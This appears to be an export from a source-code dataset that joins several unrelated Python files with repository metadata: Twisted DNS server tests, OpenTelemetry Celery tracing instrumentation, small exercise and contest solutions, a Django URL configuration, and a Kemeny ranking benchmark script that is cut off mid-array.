def test_gotResolverErrorResetsResponseAttributes(self):
"""
L{server.DNSServerFactory.gotResolverError} does not allow request
attributes to leak into the response ie it sends a response with AD, CD
set to 0 and empty response record sections.
"""
factory = server.DNSServerFactory()
responses = []
factory.sendReply = (
lambda protocol, response, address: responses.append(response)
)
request = dns.Message(authenticData=True, checkingDisabled=True)
request.answers = [object(), object()]
request.authority = [object(), object()]
request.additional = [object(), object()]
factory.gotResolverError(
failure.Failure(error.DomainError()),
protocol=None, message=request, address=None
)
self.assertEqual([dns.Message(rCode=3, answer=True)], responses)
def test_gotResolverResponseResetsResponseAttributes(self):
"""
L{server.DNSServerFactory.gotResolverResponse} does not allow request
attributes to leak into the response ie it sends a response with AD, CD
set to 0 and none of the records in the request answer sections are
copied to the response.
"""
factory = server.DNSServerFactory()
responses = []
factory.sendReply = (
lambda protocol, response, address: responses.append(response)
)
request = dns.Message(authenticData=True, checkingDisabled=True)
request.answers = [object(), object()]
request.authority = [object(), object()]
request.additional = [object(), object()]
factory.gotResolverResponse(
([], [], []),
protocol=None, message=request, address=None
)
self.assertEqual([dns.Message(rCode=0, answer=True)], responses)
def test_sendReplyWithAddress(self):
"""
If L{server.DNSServerFactory.sendReply} is supplied with a protocol
*and* an address tuple it will supply that address to
C{protocol.writeMessage}.
"""
m = dns.Message()
dummyAddress = object()
f = server.DNSServerFactory()
e = self.assertRaises(
RaisingProtocol.WriteMessageArguments,
f.sendReply,
protocol=RaisingProtocol(),
message=m,
address=dummyAddress)
args, kwargs = e.args
self.assertEqual(args, (m, dummyAddress))
self.assertEqual(kwargs, {})
def test_sendReplyWithoutAddress(self):
"""
If L{server.DNSServerFactory.sendReply} is supplied with a protocol but
no address tuple it will supply only a message to
C{protocol.writeMessage}.
"""
m = dns.Message()
f = server.DNSServerFactory()
e = self.assertRaises(
RaisingProtocol.WriteMessageArguments,
f.sendReply,
protocol=RaisingProtocol(),
message=m,
address=None)
args, kwargs = e.args
self.assertEqual(args, (m,))
self.assertEqual(kwargs, {})
def test_sendReplyLoggingNoAnswers(self):
"""
If L{server.DNSServerFactory.sendReply} logs a "no answers" message if
the supplied message has no answers.
"""
self.patch(server.time, 'time', lambda: 86402)
m = dns.Message()
m.timeReceived = 86401
f = server.DNSServerFactory(verbose=2)
assertLogMessage(
self,
["Replying with no answers", "Processed query in 1.000 seconds"],
f.sendReply,
protocol=NoopProtocol(),
message=m,
address=None)
def test_sendReplyLoggingWithAnswers(self):
"""
If L{server.DNSServerFactory.sendReply} logs a message for answers,
authority, additional if the supplied a message has records in any of
those sections.
"""
self.patch(server.time, 'time', lambda: 86402)
m = dns.Message()
m.answers.append(dns.RRHeader(payload=dns.Record_A('127.0.0.1')))
m.authority.append(dns.RRHeader(payload=dns.Record_A('127.0.0.1')))
m.additional.append(dns.RRHeader(payload=dns.Record_A('127.0.0.1')))
m.timeReceived = 86401
f = server.DNSServerFactory(verbose=2)
assertLogMessage(
self,
['Answers are <A address=127.0.0.1 ttl=None>',
'Authority is <A address=127.0.0.1 ttl=None>',
'Additional is <A address=127.0.0.1 ttl=None>',
'Processed query in 1.000 seconds'],
f.sendReply,
protocol=NoopProtocol(),
message=m,
address=None)
def test_handleInverseQuery(self):
"""
L{server.DNSServerFactory.handleInverseQuery} triggers the sending of a
response message with C{rCode} set to L{dns.ENOTIMP}.
"""
f = server.DNSServerFactory()
e = self.assertRaises(
RaisingProtocol.WriteMessageArguments,
f.handleInverseQuery,
message=dns.Message(), protocol=RaisingProtocol(), address=None)
(message,), kwargs = e.args
self.assertEqual(message.rCode, dns.ENOTIMP)
def test_handleInverseQueryLogging(self):
"""
L{server.DNSServerFactory.handleInverseQuery} logs the message origin
address if C{verbose > 0}.
"""
f = NoResponseDNSServerFactory(verbose=1)
assertLogMessage(
self,
["Inverse query from ('::1', 53)"],
f.handleInverseQuery,
message=dns.Message(),
protocol=NoopProtocol(),
address=('::1', 53))
def test_handleStatus(self):
"""
L{server.DNSServerFactory.handleStatus} triggers the sending of a
response message with C{rCode} set to L{dns.ENOTIMP}.
"""
f = server.DNSServerFactory()
e = self.assertRaises(
RaisingProtocol.WriteMessageArguments,
f.handleStatus,
message=dns.Message(), protocol=RaisingProtocol(), address=None)
(message,), kwargs = e.args
self.assertEqual(message.rCode, dns.ENOTIMP)
def test_handleStatusLogging(self):
"""
L{server.DNSServerFactory.handleStatus} logs the message origin address
if C{verbose > 0}.
"""
f = NoResponseDNSServerFactory(verbose=1)
assertLogMessage(
self,
["Status request from ('::1', 53)"],
f.handleStatus,
message=dns.Message(),
protocol=NoopProtocol(),
address=('::1', 53))
def test_handleNotify(self):
"""
L{server.DNSServerFactory.handleNotify} triggers the sending of a
response message with C{rCode} set to L{dns.ENOTIMP}.
"""
f = server.DNSServerFactory()
e = self.assertRaises(
RaisingProtocol.WriteMessageArguments,
f.handleNotify,
message=dns.Message(), protocol=RaisingProtocol(), address=None)
(message,), kwargs = e.args
self.assertEqual(message.rCode, dns.ENOTIMP)
def test_handleNotifyLogging(self):
"""
L{server.DNSServerFactory.handleNotify} logs the message origin address
if C{verbose > 0}.
"""
f = NoResponseDNSServerFactory(verbose=1)
assertLogMessage(
self,
["Notify message from ('::1', 53)"],
f.handleNotify,
message=dns.Message(),
protocol=NoopProtocol(),
address=('::1', 53))
def test_handleOther(self):
"""
L{server.DNSServerFactory.handleOther} triggers the sending of a
response message with C{rCode} set to L{dns.ENOTIMP}.
"""
f = server.DNSServerFactory()
e = self.assertRaises(
RaisingProtocol.WriteMessageArguments,
f.handleOther,
message=dns.Message(), protocol=RaisingProtocol(), address=None)
(message,), kwargs = e.args
self.assertEqual(message.rCode, dns.ENOTIMP)
def test_handleOtherLogging(self):
"""
L{server.DNSServerFactory.handleOther} logs the message origin address
if C{verbose > 0}.
"""
f = NoResponseDNSServerFactory(verbose=1)
assertLogMessage(
self,
["Unknown op code (0) from ('::1', 53)"],
f.handleOther,
message=dns.Message(),
protocol=NoopProtocol(),
address=('::1', 53))
| [
"[email protected]"
] | |
d604b39ae0f8e7002cb175fae59528062f11a466 | 5da988c176252fca1b558190eff74ef3b89afc9f | /instrumentation/opentelemetry-instrumentation-celery/src/opentelemetry/instrumentation/celery/__init__.py | d225e6bd069b0db9f870fc1da037a9f0be6aaf31 | [
"Apache-2.0"
] | permissive | kinvolk/opentelemetry-python | 3801376ee6bdb46d85d8876a97713e698e1241ce | 47483865854c7adae7455f8441dab7f814f4ce2a | refs/heads/master | 2023-05-25T19:36:05.130267 | 2020-11-02T17:29:59 | 2020-11-02T17:29:59 | 201,488,070 | 1 | 2 | Apache-2.0 | 2023-05-16T18:48:46 | 2019-08-09T14:56:28 | Python | UTF-8 | Python | false | false | 8,741 | py | # Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Instrument `celery`_ to trace Celery applications.
.. _celery: https://pypi.org/project/celery/
Usage
-----
* Start broker backend
.. code::
docker run -p 5672:5672 rabbitmq
* Run instrumented task
.. code:: python
from opentelemetry import trace
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchExportSpanProcessor
from opentelemetry.instrumentation.celery import CeleryInstrumentor
from celery import Celery
from celery.signals import worker_process_init
@worker_process_init.connect(weak=False)
def init_celery_tracing(*args, **kwargs):
trace.set_tracer_provider(TracerProvider())
span_processor = BatchExportSpanProcessor(ConsoleSpanExporter())
trace.get_tracer_provider().add_span_processor(span_processor)
CeleryInstrumentor().instrument()
app = Celery("tasks", broker="amqp://localhost")
@app.task
def add(x, y):
return x + y
add.delay(42, 50)
API
---
"""
import logging
import signal
from collections.abc import Iterable
from celery import signals # pylint: disable=no-name-in-module
from opentelemetry import propagators, trace
from opentelemetry.instrumentation.celery import utils
from opentelemetry.instrumentation.celery.version import __version__
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
from opentelemetry.trace.propagation.textmap import DictGetter
from opentelemetry.trace.status import Status, StatusCode
logger = logging.getLogger(__name__)
# Task operations
_TASK_TAG_KEY = "celery.action"
_TASK_APPLY_ASYNC = "apply_async"
_TASK_RUN = "run"
_TASK_RETRY_REASON_KEY = "celery.retry.reason"
_TASK_REVOKED_REASON_KEY = "celery.revoked.reason"
_TASK_REVOKED_TERMINATED_SIGNAL_KEY = "celery.terminated.signal"
_TASK_NAME_KEY = "celery.task_name"
_MESSAGE_ID_ATTRIBUTE_NAME = "messaging.message_id"
class CarrierGetter(DictGetter):
    """Read propagation values from a Celery ``task.request`` carrier.

    Celery exposes incoming message headers as attributes of the request
    object, so lookups use ``getattr`` rather than dict access.
    """
    def get(self, carrier, key):
        # Propagators expect an iterable of values; wrap scalars — and
        # strings, which are iterable but represent a single value — in a
        # one-element tuple.
        value = getattr(carrier, key, [])
        if isinstance(value, str) or not isinstance(value, Iterable):
            value = (value,)
        return value
    def keys(self, carrier):
        # NOTE(review): attribute-based carriers are not enumerated here, so
        # no keys are reported; presumably acceptable for extract-only use —
        # confirm against the propagator API's expectations.
        return []
carrier_getter = CarrierGetter()
class CeleryInstrumentor(BaseInstrumentor):
    """Instrument Celery by hooking its task lifecycle signals.

    Publishing a task starts a PRODUCER span whose context is injected into
    the outgoing message headers; executing a task starts a CONSUMER span
    that continues the propagated trace.
    """
    def _instrument(self, **kwargs):
        """Connect signal receivers; an optional ``tracer_provider`` may be
        supplied via keyword argument."""
        tracer_provider = kwargs.get("tracer_provider")
        # pylint: disable=attribute-defined-outside-init
        self._tracer = trace.get_tracer(__name__, __version__, tracer_provider)
        # weak=False keeps the bound-method receivers from being garbage
        # collected while the instrumentation is active.
        signals.task_prerun.connect(self._trace_prerun, weak=False)
        signals.task_postrun.connect(self._trace_postrun, weak=False)
        signals.before_task_publish.connect(
            self._trace_before_publish, weak=False
        )
        signals.after_task_publish.connect(
            self._trace_after_publish, weak=False
        )
        signals.task_failure.connect(self._trace_failure, weak=False)
        signals.task_retry.connect(self._trace_retry, weak=False)
    def _uninstrument(self, **kwargs):
        """Disconnect every receiver registered by ``_instrument``."""
        signals.task_prerun.disconnect(self._trace_prerun)
        signals.task_postrun.disconnect(self._trace_postrun)
        signals.before_task_publish.disconnect(self._trace_before_publish)
        signals.after_task_publish.disconnect(self._trace_after_publish)
        signals.task_failure.disconnect(self._trace_failure)
        signals.task_retry.disconnect(self._trace_retry)
    def _trace_prerun(self, *args, **kwargs):
        """Start a CONSUMER span just before a task body executes."""
        task = utils.retrieve_task(kwargs)
        task_id = utils.retrieve_task_id(kwargs)
        if task is None or task_id is None:
            return
        request = task.request
        # Continue the trace injected into the message headers, which Celery
        # exposes as attributes of ``task.request``.
        tracectx = propagators.extract(carrier_getter, request) or None
        logger.debug("prerun signal start task_id=%s", task_id)
        operation_name = "{0}/{1}".format(_TASK_RUN, task.name)
        span = self._tracer.start_span(
            operation_name, context=tracectx, kind=trace.SpanKind.CONSUMER
        )
        activation = self._tracer.use_span(span, end_on_exit=True)
        activation.__enter__()
        # Stash (span, activation) on the task so _trace_postrun can end it.
        utils.attach_span(task, task_id, (span, activation))
    @staticmethod
    def _trace_postrun(*args, **kwargs):
        """Finish the CONSUMER span once the task body has returned."""
        task = utils.retrieve_task(kwargs)
        task_id = utils.retrieve_task_id(kwargs)
        if task is None or task_id is None:
            return
        logger.debug("postrun signal task_id=%s", task_id)
        # retrieve and finish the Span
        span, activation = utils.retrieve_span(task, task_id)
        if span is None:
            logger.warning("no existing span found for task_id=%s", task_id)
            return
        # request context tags
        if span.is_recording():
            span.set_attribute(_TASK_TAG_KEY, _TASK_RUN)
            utils.set_attributes_from_context(span, kwargs)
            utils.set_attributes_from_context(span, task.request)
            span.set_attribute(_TASK_NAME_KEY, task.name)
        activation.__exit__(None, None, None)
        utils.detach_span(task, task_id)
    def _trace_before_publish(self, *args, **kwargs):
        """Start a PRODUCER span and inject its context into the headers."""
        task = utils.retrieve_task_from_sender(kwargs)
        task_id = utils.retrieve_task_id_from_message(kwargs)
        if task is None or task_id is None:
            return
        operation_name = "{0}/{1}".format(_TASK_APPLY_ASYNC, task.name)
        span = self._tracer.start_span(
            operation_name, kind=trace.SpanKind.PRODUCER
        )
        # apply some attributes here because most of the data is not available
        if span.is_recording():
            span.set_attribute(_TASK_TAG_KEY, _TASK_APPLY_ASYNC)
            span.set_attribute(_MESSAGE_ID_ATTRIBUTE_NAME, task_id)
            span.set_attribute(_TASK_NAME_KEY, task.name)
            utils.set_attributes_from_context(span, kwargs)
        activation = self._tracer.use_span(span, end_on_exit=True)
        activation.__enter__()
        utils.attach_span(task, task_id, (span, activation), is_publish=True)
        headers = kwargs.get("headers")
        if headers:
            # Write the active context into the outgoing message headers so
            # the worker side can pick it up in _trace_prerun.
            propagators.inject(type(headers).__setitem__, headers)
    @staticmethod
    def _trace_after_publish(*args, **kwargs):
        """Finish the PRODUCER span once the message has been sent."""
        task = utils.retrieve_task_from_sender(kwargs)
        task_id = utils.retrieve_task_id_from_message(kwargs)
        if task is None or task_id is None:
            return
        # retrieve and finish the Span
        _, activation = utils.retrieve_span(task, task_id, is_publish=True)
        if activation is None:
            logger.warning("no existing span found for task_id=%s", task_id)
            return
        activation.__exit__(None, None, None)
        utils.detach_span(task, task_id, is_publish=True)
    @staticmethod
    def _trace_failure(*args, **kwargs):
        """Mark the active span as ERROR, unless the exception is expected."""
        task = utils.retrieve_task_from_sender(kwargs)
        task_id = utils.retrieve_task_id(kwargs)
        if task is None or task_id is None:
            return
        # retrieve and pass exception info to activation
        span, _ = utils.retrieve_span(task, task_id)
        if span is None or not span.is_recording():
            return
        status_kwargs = {"status_code": StatusCode.ERROR}
        ex = kwargs.get("einfo")
        if (
            hasattr(task, "throws")
            and ex is not None
            and isinstance(ex.exception, task.throws)
        ):
            # Exceptions listed in ``task.throws`` are expected outcomes and
            # must not flip the span status to ERROR.
            return
        if ex is not None:
            status_kwargs["description"] = str(ex)
        span.set_status(Status(**status_kwargs))
    @staticmethod
    def _trace_retry(*args, **kwargs):
        """Record the retry reason on the active span."""
        task = utils.retrieve_task_from_sender(kwargs)
        task_id = utils.retrieve_task_id_from_request(kwargs)
        reason = utils.retrieve_reason(kwargs)
        if task is None or task_id is None or reason is None:
            return
        span, _ = utils.retrieve_span(task, task_id)
        if span is None or not span.is_recording():
            return
        # Add retry reason metadata to span
        # Use `str(reason)` instead of `reason.message` in case we get
        # something that isn't an `Exception`
        span.set_attribute(_TASK_RETRY_REASON_KEY, str(reason))
| [
"[email protected]"
] | |
26fc8b49fcc85ffb16820963727e86ecec723ae3 | abccdbf9b0849b47960c3c352870793405debfed | /0x02-python-import_modules/3-infinite_add.py | 319d74896baaa8ff2b1e4ae09a0a2729223fdf4b | [] | no_license | hunterxx0/holbertonschool-higher_level_programming | 88b1b0f31b536c6940f2e64a6924a06ba9cbf193 | 44064cf0722cd20d93f58b64ab185d2898770d73 | refs/heads/master | 2022-12-20T12:14:15.877147 | 2020-09-24T21:25:54 | 2020-09-24T21:25:54 | 259,276,369 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | #!/usr/bin/python3
if __name__ == "__main__":
from sys import argv
x = len(argv)
if x == 2:
print("{}".format(argv[1]))
elif x == 1:
print("0")
else:
s = 0
for i in range(1, x):
s += int(argv[i])
print("{}".format(s))
| [
"[email protected]"
] | |
ead86ff3ce709ffe0865987335eb19c8dcab3987 | 8a3c1c66828008941dffad983ad79936830045d7 | /abc172/b.py | 084cbc4ece4e6e4b1bae05f8ff60e9956d5934a1 | [
"MIT"
] | permissive | nishio/atcoder | 71130c7923f557b5269ffd8063dab1f7e2732a30 | 8db36537b5d8580745d5f98312162506ad7d7ab4 | refs/heads/master | 2023-04-15T07:41:00.322297 | 2021-04-25T09:00:26 | 2021-04-25T09:00:26 | 273,831,891 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 72 | py | S = input()
T = input()
print(sum(S[i] != T[i] for i in range(len(S))))
| [
"[email protected]"
] | |
3cad8bd54419850ca2db1e342c3d3452f6f847f5 | 3b4b188514c33a1f4568baa59a2a385a2d7b6205 | /config/urls.py | b7d78a9010e1d399cb8c68101fcb8d15635d4acf | [] | no_license | amyth/django-starter | 5d74a7a5654611f966748523982d9d4591f1e43d | 8a629cd717c038677488fd1860cc6001baf8c542 | refs/heads/master | 2020-05-17T17:32:46.993614 | 2014-09-24T07:15:17 | 2014-09-24T07:15:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | """ Main project url confuguration module. Other url modules
to be included in this module.
"""
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Custom apps' urls
url(r'^', include('candidates.urls')),
url(r'^', include('recruiters.urls')),
# Third party apps' urls
url(r'^', include('social_auth.urls')),
url(r'^api', include('rest_framework.urls', namespace='rest_framework')),
# Admin urls
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
url(r'^admin/', include(admin.site.urls)),
)
| [
"[email protected]"
] | |
087bc3914f01d56c5b118f5446be99dce12b524f | bd72c02af0bbd8e3fc0d0b131e3fb9a2aaa93e75 | /Backtracking/restore_ip_addresses.py | 9f2f7ded2404852ca3a967a2eb84096a1fa29da3 | [] | no_license | harvi7/Leetcode-Problems-Python | d3a5e8898aceb11abc4cae12e1da50061c1d352c | 73adc00f6853e821592c68f5dddf0a823cce5d87 | refs/heads/master | 2023-05-11T09:03:03.181590 | 2023-04-29T22:03:41 | 2023-04-29T22:03:41 | 222,657,838 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | class Solution:
def restoreIpAddresses(self, s: str) -> List[str]:
def dfs(idx, path):
if len(path) == 4 or idx == len(s):
if len(path) == 4 and idx == len(s):
output.append(".".join(path))
return
for i in range(idx, min(idx + 3, len(s))):
ip = s[idx : i + 1]
if i == idx or (i > idx and s[idx] != "0" and int(ip) < 256):
dfs(i + 1, path + [ip])
output = []
dfs(0, [])
return output | [
"[email protected]"
] | |
ef4a126562505db34aa836430078148dcbfd71a4 | a462a24ff937e151e8151f3a1bdc9c3714b12c0e | /2021EJOR/scripts/mebb/mebb_11_51.py | 17f1585137674da26b982b1f87cdbfac36fdc275 | [] | no_license | noeliarico/kemeny | b4cbcac57203237769252de2c50ce959aa4ca50e | 50819f8bf0d19fb29a0b5c6d2ee031e8a811497d | refs/heads/main | 2023-03-29T14:36:37.931286 | 2023-03-16T09:04:12 | 2023-03-16T09:04:12 | 330,797,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188,718 | py |
import numpy as np
import pandas as pd
import time
from kemeny import algorithms as alg
rep = 3  # timing repetitions per problem instance; the median is reported
# Result accumulator: one row per instance with 7 metadata columns
# (n candidates, m voters, instance id, algorithm name, median time,
# number of solutions, number of tentative solutions) followed by the
# `rep` individual raw timings — hence width 7 + rep.
results = np.zeros(0).reshape(0,7+rep)
##############################################################
om = np.array([
[0,32,14,21,25,27,30,23,22,16,21],
[19,0,15,18,16,21,21,18,18,17,17],
[37,36,0,32,28,30,31,22,19,25,23],
[30,33,19,0,33,25,27,29,27,19,23],
[26,35,23,18,0,24,24,21,26,24,20],
[24,30,21,26,27,0,27,20,29,26,20],
[21,30,20,24,27,24,0,22,22,24,22],
[28,33,29,22,30,31,29,0,26,28,24],
[29,33,32,24,25,22,29,25,0,22,21],
[35,34,26,32,27,25,27,23,29,0,28],
[30,34,28,28,31,31,29,27,30,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 1, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,31,29,29,24,22,25,26,28,22],
[22,0,27,25,22,23,23,26,19,23,22],
[20,24,0,25,22,21,22,22,21,27,21],
[22,26,26,0,25,25,26,27,24,27,23],
[22,29,29,26,0,27,26,29,20,31,26],
[27,28,30,26,24,0,22,28,23,33,23],
[29,28,29,25,25,29,0,26,22,30,25],
[26,25,29,24,22,23,25,0,20,27,25],
[25,32,30,27,31,28,29,31,0,32,20],
[23,28,24,24,20,18,21,24,19,0,24],
[29,29,30,28,25,28,26,26,31,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 2, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,14,19,23,21,18,15,26,26,30,23],
[37,0,24,24,23,31,29,29,29,32,32],
[32,27,0,29,23,31,24,22,26,26,27],
[28,27,22,0,25,31,22,26,25,33,30],
[30,28,28,26,0,30,22,28,24,37,27],
[33,20,20,20,21,0,19,28,23,31,29],
[36,22,27,29,29,32,0,32,34,33,31],
[25,22,29,25,23,23,19,0,24,29,23],
[25,22,25,26,27,28,17,27,0,27,22],
[21,19,25,18,14,20,18,22,24,0,22],
[28,19,24,21,24,22,20,28,29,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 3, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,30,51,30,20,30,20,30,30,20,30],
[21,0,31,51,41,31,21,51,31,21,41],
[0,20,0,30,20,0,0,30,0,0,20],
[21,0,21,0,21,21,21,31,21,21,41],
[31,10,31,30,0,31,31,51,31,31,51],
[21,20,51,30,20,0,41,51,21,41,41],
[31,30,51,30,20,10,0,51,31,21,51],
[21,0,21,20,0,0,0,0,0,0,41],
[21,20,51,30,20,30,20,51,0,20,41],
[31,30,51,30,20,10,30,51,31,0,51],
[21,10,31,10,0,10,0,10,10,0,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 4, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,31,32,29,33,31,21,19,28,24,24],
[20,0,22,22,20,25,25,16,21,24,17],
[19,29,0,20,31,28,27,20,24,25,21],
[22,29,31,0,32,32,25,25,27,25,28],
[18,31,20,19,0,25,24,16,25,20,24],
[20,26,23,19,26,0,26,17,21,27,17],
[30,26,24,26,27,25,0,24,21,16,20],
[32,35,31,26,35,34,27,0,34,22,30],
[23,30,27,24,26,30,30,17,0,23,18],
[27,27,26,26,31,24,35,29,28,0,22],
[27,34,30,23,27,34,31,21,33,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 5, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,31,25,33,25,28,30,25,29,33],
[23,0,20,19,36,26,29,34,25,36,24],
[20,31,0,22,28,24,31,27,20,23,37],
[26,32,29,0,29,25,24,27,27,31,36],
[18,15,23,22,0,28,26,22,23,21,20],
[26,25,27,26,23,0,28,20,22,22,26],
[23,22,20,27,25,23,0,22,29,21,18],
[21,17,24,24,29,31,29,0,29,29,22],
[26,26,31,24,28,29,22,22,0,24,28],
[22,15,28,20,30,29,30,22,27,0,22],
[18,27,14,15,31,25,33,29,23,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 6, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,28,29,27,22,24,26,27,28,23],
[22,0,26,29,25,24,18,22,16,23,16],
[23,25,0,26,24,20,21,22,22,25,25],
[22,22,25,0,26,23,19,24,19,21,20],
[24,26,27,25,0,26,22,25,22,22,21],
[29,27,31,28,25,0,23,25,25,25,27],
[27,33,30,32,29,28,0,29,24,27,28],
[25,29,29,27,26,26,22,0,20,24,22],
[24,35,29,32,29,26,27,31,0,27,26],
[23,28,26,30,29,26,24,27,24,0,25],
[28,35,26,31,30,24,23,29,25,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 7, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,27,34,27,26,28,24,30,31,29],
[22,0,24,22,24,20,22,19,25,22,18],
[24,27,0,28,25,27,29,22,25,30,29],
[17,29,23,0,25,30,27,23,27,24,16],
[24,27,26,26,0,25,34,25,29,25,17],
[25,31,24,21,26,0,22,20,26,28,23],
[23,29,22,24,17,29,0,24,23,32,19],
[27,32,29,28,26,31,27,0,28,28,24],
[21,26,26,24,22,25,28,23,0,26,21],
[20,29,21,27,26,23,19,23,25,0,16],
[22,33,22,35,34,28,32,27,30,35,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 8, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,28,28,34,28,25,25,28,27,28],
[22,0,22,14,26,22,21,18,23,26,17],
[23,29,0,23,27,24,27,22,27,26,22],
[23,37,28,0,37,34,25,26,32,29,25],
[17,25,24,14,0,21,19,14,21,22,20],
[23,29,27,17,30,0,22,24,26,26,25],
[26,30,24,26,32,29,0,28,30,24,27],
[26,33,29,25,37,27,23,0,29,26,26],
[23,28,24,19,30,25,21,22,0,24,22],
[24,25,25,22,29,25,27,25,27,0,23],
[23,34,29,26,31,26,24,25,29,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 9, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,24,47,47,47,47,34,51,34,47],
[27,0,40,36,36,47,51,23,40,27,51],
[27,11,0,23,36,47,47,34,27,23,34],
[4,15,28,0,51,51,28,11,15,27,15],
[4,15,15,0,0,28,15,11,4,27,15],
[4,4,4,0,23,0,15,0,4,27,4],
[4,0,4,23,36,36,0,23,4,27,23],
[17,28,17,40,40,51,28,0,17,27,51],
[0,11,24,36,47,47,47,34,0,23,47],
[17,24,28,24,24,24,24,24,28,0,24],
[4,0,17,36,36,47,28,0,4,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 10, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,16,26,26,31,25,20,28,19,23,32],
[35,0,32,23,32,27,26,31,23,28,28],
[25,19,0,28,38,30,24,29,38,25,27],
[25,28,23,0,38,32,21,25,30,24,27],
[20,19,13,13,0,15,20,15,22,18,21],
[26,24,21,19,36,0,21,23,26,20,27],
[31,25,27,30,31,30,0,27,26,25,28],
[23,20,22,26,36,28,24,0,23,25,38],
[32,28,13,21,29,25,25,28,0,30,30],
[28,23,26,27,33,31,26,26,21,0,28],
[19,23,24,24,30,24,23,13,21,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 11, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
